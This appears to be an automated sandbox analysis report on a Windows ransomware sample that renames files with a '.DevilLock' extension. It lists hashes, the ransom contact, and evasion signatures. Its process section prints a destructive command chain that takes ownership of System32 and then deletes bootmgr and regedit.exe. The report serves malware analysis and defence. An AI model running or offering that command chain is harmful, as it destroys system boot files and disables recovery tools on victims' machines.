Analysis
-
max time kernel
97s -
max time network
47s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
26-06-2022 02:01
Static task
static1
Behavioral task
behavioral1
Sample
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
Resource
win7-20220414-en
General
-
Target
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
-
Size
3.1MB
-
MD5
6a85d0ba4d1db63d390b7a071d60e0ef
-
SHA1
79a32ee067e19b43bc3f29fde3a3ff95986f8e2e
-
SHA256
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412
-
SHA512
16a97e39d6a373c3eb7140c93fd61afd12a7569d262ee67a47ac548cffc5735379dee85ba68dabb9a0aa768e5505fe6a451fd08aae68006aa1962b2861c8a6ce
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\HOW-TO-DECRYPT.TXT
CobraLocker@mail2tor.com
http://mail2tor2zyjdctd.onion/
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe -
Disables Task Manager via registry modification
-
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exedescription ioc process File renamed C:\Users\Admin\Pictures\MeasureRestart.crw => C:\Users\Admin\Pictures\MeasureRestart.crw.DevilLock 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe File renamed C:\Users\Admin\Pictures\RegisterDisable.crw => C:\Users\Admin\Pictures\RegisterDisable.crw.DevilLock 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe File renamed C:\Users\Admin\Pictures\SplitPush.png => C:\Users\Admin\Pictures\SplitPush.png.DevilLock 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe -
Possible privilege escalation attempt 5 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exetakeown.exepid process 1520 icacls.exe 844 takeown.exe 1804 icacls.exe 396 takeown.exe 2008 takeown.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe -
Modifies file permissions 1 TTPs 5 IoCs
Processes:
takeown.exeicacls.exetakeown.exetakeown.exeicacls.exepid process 844 takeown.exe 1804 icacls.exe 396 takeown.exe 2008 takeown.exe 1520 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/1192-57-0x0000000001130000-0x0000000001960000-memory.dmp themida behavioral1/memory/1192-58-0x0000000001130000-0x0000000001960000-memory.dmp themida -
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exepid process 1192 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 1192 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe Token: SeDebugPrivilege 1192 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe Token: SeTakeOwnershipPrivilege 2008 takeown.exe Token: SeTakeOwnershipPrivilege 844 takeown.exe Token: SeTakeOwnershipPrivilege 396 takeown.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.execmd.exedescription pid process target process PID 1192 wrote to memory of 1524 1192 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe cmd.exe PID 1192 wrote to memory of 1524 1192 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe cmd.exe PID 1192 wrote to memory of 1524 1192 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe cmd.exe PID 1192 wrote to memory of 1524 1192 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe cmd.exe PID 1524 wrote to memory of 2008 1524 cmd.exe takeown.exe PID 1524 wrote to memory of 2008 1524 cmd.exe takeown.exe PID 1524 wrote to memory of 2008 1524 cmd.exe takeown.exe PID 1524 wrote to memory of 2008 1524 cmd.exe takeown.exe PID 1524 wrote to memory of 1520 1524 cmd.exe icacls.exe PID 1524 wrote to memory of 1520 1524 cmd.exe icacls.exe PID 1524 wrote to memory of 1520 1524 cmd.exe icacls.exe PID 1524 wrote to memory of 1520 1524 cmd.exe icacls.exe PID 1524 wrote to memory of 844 1524 cmd.exe takeown.exe PID 1524 wrote to memory of 844 1524 cmd.exe takeown.exe PID 1524 wrote to memory of 844 1524 cmd.exe takeown.exe PID 1524 wrote to memory of 844 1524 cmd.exe takeown.exe PID 1524 wrote to memory of 1804 1524 cmd.exe icacls.exe PID 1524 wrote to memory of 1804 1524 cmd.exe icacls.exe PID 1524 wrote to memory of 1804 1524 cmd.exe icacls.exe PID 1524 wrote to memory of 1804 1524 cmd.exe icacls.exe PID 1524 wrote to memory of 396 1524 cmd.exe takeown.exe PID 1524 wrote to memory of 396 1524 cmd.exe takeown.exe PID 1524 wrote to memory of 396 1524 cmd.exe takeown.exe PID 1524 wrote to memory of 396 1524 cmd.exe takeown.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe"C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Modifies extensions of user files
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System323⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32 /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\drivers3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/396-67-0x0000000000000000-mapping.dmp
-
memory/844-65-0x0000000000000000-mapping.dmp
-
memory/1192-54-0x00000000765C1000-0x00000000765C3000-memory.dmpFilesize
8KB
-
memory/1192-57-0x0000000001130000-0x0000000001960000-memory.dmpFilesize
8.2MB
-
memory/1192-58-0x0000000001130000-0x0000000001960000-memory.dmpFilesize
8.2MB
-
memory/1192-59-0x0000000001130000-0x0000000001960000-memory.dmpFilesize
8.2MB
-
memory/1192-60-0x0000000077B80000-0x0000000077D00000-memory.dmpFilesize
1.5MB
-
memory/1192-61-0x0000000001130000-0x0000000001960000-memory.dmpFilesize
8.2MB
-
memory/1520-64-0x0000000000000000-mapping.dmp
-
memory/1524-62-0x0000000000000000-mapping.dmp
-
memory/1804-66-0x0000000000000000-mapping.dmp
-
memory/2008-63-0x0000000000000000-mapping.dmp